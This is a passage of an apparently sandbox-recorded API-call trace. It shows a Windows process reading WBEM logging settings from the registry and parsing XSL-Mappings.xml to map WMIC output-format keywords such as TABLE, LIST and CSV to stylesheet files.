[0562.174] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0562.174] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
[0562.174] memcpy (in: _Dst=0x2a4928, _Src=0x286718, _Size=0x34 | out: _Dst=0x2a4928) returned 0x2a4928
[0562.174] memcpy (in: _Dst=0x2a495a, _Src=0x2a1498, _Size=0x22 | out: _Dst=0x2a495a) returned 0x2a495a
[0562.174] free (_Block=0x189020)
[0562.174] free (_Block=0x189000)
[0562.174] GetCurrentThreadId () returned 0x440
[0562.174] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xaf0e0 | out: phkResult=0xaf0e0*=0x10c) returned 0x0
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xaf130, lpcbData=0xaf0d0*=0x400 | out: lpType=0x0, lpData=0xaf130*=0x30, lpcbData=0xaf0d0*=0x4) returned 0x0
[0562.175] _wcsicmp (_String1="0", _String2="1") returned -1
[0562.175] _wcsicmp (_String1="0", _String2="2") returned -2
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xaf0d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xaf0d0*=0x42) returned 0x0
[0562.175] malloc (_Size=0x86) returned 0x186e60
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x186e60, lpcbData=0xaf0d0*=0x42 | out: lpType=0x0, lpData=0x186e60*=0x25, lpcbData=0xaf0d0*=0x42) returned 0x0
[0562.175] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0562.175] malloc (_Size=0x42) returned 0x186ef0
[0562.175] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xaf130, lpcbData=0xaf0d0*=0x400 | out: lpType=0x0, lpData=0xaf130*=0x36, lpcbData=0xaf0d0*=0xc) returned 0x0
[0562.175] _wtol (_String="65536") returned 65536
[0562.176] free (_Block=0x186e60)
[0562.176] RegCloseKey (hKey=0x0) returned 0x6
[0562.176] CoCreateInstance (in: rclsid=0xffa67410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf5d8 | out: ppv=0xaf5d8*=0x1fd71d0) returned 0x0
[0562.494] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1fd71d0, xmlSource=0xaf720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x186e60), isSuccessful=0xaf790 | out: isSuccessful=0xaf790*=0xffff) returned 0x0
[0562.927] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1fd71d0, DOMElement=0xaf5d0 | out: DOMElement=0xaf5d0*=0x1fdbc50) returned 0x0
[0562.927] malloc (_Size=0x18) returned 0x189000
[0562.927] IXMLDOMElement:getElementsByTagName (in: This=0x1fdbc50, tagName="XSLFORMAT", resultList=0xaf5e0 | out: resultList=0xaf5e0*=0x1fd9cc0) returned 0x0
[0562.930] free (_Block=0x189000)
[0562.930] IXMLDOMNodeList:get_length (in: This=0x1fd9cc0, listLength=0xaf7a8 | out: listLength=0xaf7a8*=21) returned 0x0
[0562.930] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=0, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.931] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.931] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.931] malloc (_Size=0x18) returned 0x189000
[0562.931] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.931] free (_Block=0x189000)
[0562.931] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x80070001c)) returned 0x0
[0562.931] malloc (_Size=0x18) returned 0x189000
[0562.932] malloc (_Size=0x18) returned 0x189020
[0562.932] malloc (_Size=0x30) returned 0x1880c0
[0562.932] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.932] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.932] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.932] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=1, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.932] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.932] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.932] malloc (_Size=0x18) returned 0x189060
[0562.933] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.933] free (_Block=0x189060)
[0562.933] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x80070001c)) returned 0x0
[0562.933] malloc (_Size=0x18) returned 0x189060
[0562.933] malloc (_Size=0x18) returned 0x189080
[0562.934] SysStringLen (param_1="VALUE") returned 0x5
[0562.934] SysStringLen (param_1="TABLE") returned 0x5
[0562.934] SysStringLen (param_1="TABLE") returned 0x5
[0562.934] SysStringLen (param_1="VALUE") returned 0x5
[0562.934] malloc (_Size=0x30) returned 0x188100
[0562.934] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.934] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.934] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.934] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=2, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.934] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.934] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.934] malloc (_Size=0x18) returned 0x1890a0
[0562.934] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.935] free (_Block=0x1890a0)
[0562.935] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x80070001c)) returned 0x0
[0562.935] malloc (_Size=0x18) returned 0x1890a0
[0562.935] malloc (_Size=0x18) returned 0x1890c0
[0562.935] SysStringLen (param_1="LIST") returned 0x4
[0562.935] SysStringLen (param_1="TABLE") returned 0x5
[0562.935] malloc (_Size=0x30) returned 0x188140
[0562.935] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.935] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.935] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.935] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=3, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.935] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="rawxml.xsl") returned 0x0
[0562.936] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.936] malloc (_Size=0x18) returned 0x1890e0
[0562.936] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.936] free (_Block=0x1890e0)
[0562.936] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x80070001c)) returned 0x0
[0562.936] malloc (_Size=0x18) returned 0x1890e0
[0562.936] malloc (_Size=0x18) returned 0x189100
[0562.936] SysStringLen (param_1="RAWXML") returned 0x6
[0562.936] SysStringLen (param_1="TABLE") returned 0x5
[0562.936] SysStringLen (param_1="RAWXML") returned 0x6
[0562.936] SysStringLen (param_1="LIST") returned 0x4
[0562.936] SysStringLen (param_1="LIST") returned 0x4
[0562.936] SysStringLen (param_1="RAWXML") returned 0x6
[0562.936] malloc (_Size=0x30) returned 0x188180
[0562.937] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.937] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.937] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.937] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=4, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.937] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="htable.xsl") returned 0x0
[0562.937] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.937] malloc (_Size=0x18) returned 0x189120
[0562.937] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.937] free (_Block=0x189120)
[0562.937] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x80070001c)) returned 0x0
[0562.937] malloc (_Size=0x18) returned 0x189120
[0562.938] malloc (_Size=0x18) returned 0x189140
[0562.938] SysStringLen (param_1="HTABLE") returned 0x6
[0562.938] SysStringLen (param_1="TABLE") returned 0x5
[0562.938] SysStringLen (param_1="HTABLE") returned 0x6
[0562.938] SysStringLen (param_1="LIST") returned 0x4
[0562.938] malloc (_Size=0x30) returned 0x1881c0
[0562.938] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.938] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.938] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.938] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=5, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.938] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="hform.xsl") returned 0x0
[0562.938] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.938] malloc (_Size=0x18) returned 0x189160
[0562.939] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.939] free (_Block=0x189160)
[0562.939] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x80070001c)) returned 0x0
[0562.939] malloc (_Size=0x18) returned 0x189160
[0562.939] malloc (_Size=0x18) returned 0x189180
[0562.939] SysStringLen (param_1="HFORM") returned 0x5
[0562.939] SysStringLen (param_1="TABLE") returned 0x5
[0562.939] SysStringLen (param_1="HFORM") returned 0x5
[0562.939] SysStringLen (param_1="LIST") returned 0x4
[0562.939] SysStringLen (param_1="HFORM") returned 0x5
[0562.939] SysStringLen (param_1="HTABLE") returned 0x6
[0562.939] malloc (_Size=0x30) returned 0x188200
[0562.940] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.940] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.940] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.940] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=6, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.940] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="xml.xsl") returned 0x0
[0562.940] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.940] malloc (_Size=0x18) returned 0x1891a0
[0562.940] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.940] free (_Block=0x1891a0)
[0562.940] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x80070001c)) returned 0x0
[0562.940] malloc (_Size=0x18) returned 0x1891a0
[0562.940] malloc (_Size=0x18) returned 0x1891c0
[0562.941] SysStringLen (param_1="XML") returned 0x3
[0562.941] SysStringLen (param_1="TABLE") returned 0x5
[0562.941] SysStringLen (param_1="XML") returned 0x3
[0562.941] SysStringLen (param_1="VALUE") returned 0x5
[0562.941] SysStringLen (param_1="VALUE") returned 0x5
[0562.941] SysStringLen (param_1="XML") returned 0x3
[0562.941] malloc (_Size=0x30) returned 0x188240
[0562.941] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.941] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.941] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.941] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=7, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.941] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="mof.xsl") returned 0x0
[0562.941] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.941] malloc (_Size=0x18) returned 0x1891e0
[0562.942] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.942] free (_Block=0x1891e0)
[0562.942] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x80070001c)) returned 0x0
[0562.942] malloc (_Size=0x18) returned 0x1891e0
[0562.942] malloc (_Size=0x18) returned 0x189200
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] SysStringLen (param_1="TABLE") returned 0x5
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] SysStringLen (param_1="LIST") returned 0x4
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] SysStringLen (param_1="RAWXML") returned 0x6
[0562.942] SysStringLen (param_1="LIST") returned 0x4
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] malloc (_Size=0x30) returned 0x188280
[0562.943] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.943] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.943] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.943] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=8, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.943] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="csv.xsl") returned 0x0
[0562.943] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.943] malloc (_Size=0x18) returned 0x189220
[0562.943] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.943] free (_Block=0x189220)
[0562.943] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x80070001c)) returned 0x0
[0562.943] malloc (_Size=0x18) returned 0x189220
[0562.943] malloc (_Size=0x18) returned 0x189240
[0562.943] SysStringLen (param_1="CSV") returned 0x3
[0562.943] SysStringLen (param_1="TABLE") returned 0x5
[0562.944] SysStringLen (param_1="CSV") returned 0x3
[0562.944] SysStringLen (param_1="LIST") returned 0x4
[0562.944] SysStringLen (param_1="CSV") returned 0x3
[0562.944] SysStringLen (param_1="HTABLE") returned 0x6
[0562.944] SysStringLen (param_1="CSV") returned 0x3
[0562.944] SysStringLen (param_1="HFORM") returned 0x5
[0562.944] malloc (_Size=0x30) returned 0x1882c0
[0562.944] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.944] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.944] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.944] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=9, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.944] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.944] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.944] malloc (_Size=0x18) returned 0x189260
[0562.944] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.945] free (_Block=0x189260)
[0562.945] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x80070001c)) returned 0x0
[0562.945] malloc (_Size=0x18) returned 0x189260
[0562.945] malloc (_Size=0x18) returned 0x189280
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] SysStringLen (param_1="TABLE") returned 0x5
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] SysStringLen (param_1="VALUE") returned 0x5
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] SysStringLen (param_1="XML") returned 0x3
[0562.945] SysStringLen (param_1="XML") returned 0x3
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] malloc (_Size=0x30) returned 0x188300
[0562.945] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.945] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.946] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.946] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=10, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.946] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.946] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.946] malloc (_Size=0x18) returned 0x1892a0
[0562.946] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.946] free (_Block=0x1892a0)
[0562.946] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x80070001c)) returned 0x0
[0562.946] malloc (_Size=0x18) returned 0x1892a0
[0562.946] malloc (_Size=0x18) returned 0x1892c0
[0562.946] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] SysStringLen (param_1="TABLE") returned 0x5
[0562.947] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] SysStringLen (param_1="XML") returned 0x3
[0562.947] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.947] SysStringLen (param_1="XML") returned 0x3
[0562.947] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] malloc (_Size=0x30) returned 0x188340
[0562.947] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.947] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.947] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.947] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=11, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.947] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.947] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.948] malloc (_Size=0x18) returned 0x1892e0
[0562.948] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.948] free (_Block=0x1892e0)
[0562.948] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x80070001c)) returned 0x0
[0562.948] malloc (_Size=0x18) returned 0x1892e0
[0562.948] malloc (_Size=0x18) returned 0x189300
[0562.948] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] SysStringLen (param_1="TABLE") returned 0x5
[0562.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] SysStringLen (param_1="XML") returned 0x3
[0562.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] malloc (_Size=0x30) returned 0x188380
[0562.949] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.949] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.949] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.949] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=12, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.949] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.949] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.949] malloc (_Size=0x18) returned 0x189320
[0562.950] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.950] free (_Block=0x189320)
[0562.950] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x80070001c)) returned 0x0
[0562.950] malloc (_Size=0x18) returned 0x189320
[0562.950] malloc (_Size=0x18) returned 0x189340
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="TABLE") returned 0x5
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="XML") returned 0x3
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] malloc (_Size=0x30) returned 0x1883c0
[0562.951] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.951] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.951] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.951] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=13, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.951] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.951] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.951] malloc (_Size=0x18) returned 0x189360
[0562.951] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.951] free (_Block=0x189360)
[0562.951] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x80070001c)) returned 0x0
[0562.951] malloc (_Size=0x18) returned 0x189360
[0562.952] malloc (_Size=0x18) returned 0x189380
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="TABLE") returned 0x5
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="XML") returned 0x3
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.952] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] malloc (_Size=0x30) returned 0x188400
[0562.952] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.952] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.952] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.952] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=14, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.953] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.953] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.953] malloc (_Size=0x18) returned 0x1893a0
[0562.953] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.953] free (_Block=0x1893a0)
[0562.953] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x80070001c)) returned 0x0
[0562.953] malloc (_Size=0x18) returned 0x1893a0
[0562.953] malloc (_Size=0x18) returned 0x1893c0
[0562.953] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.953] SysStringLen (param_1="TABLE") returned 0x5
[0562.953] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="XML") returned 0x3
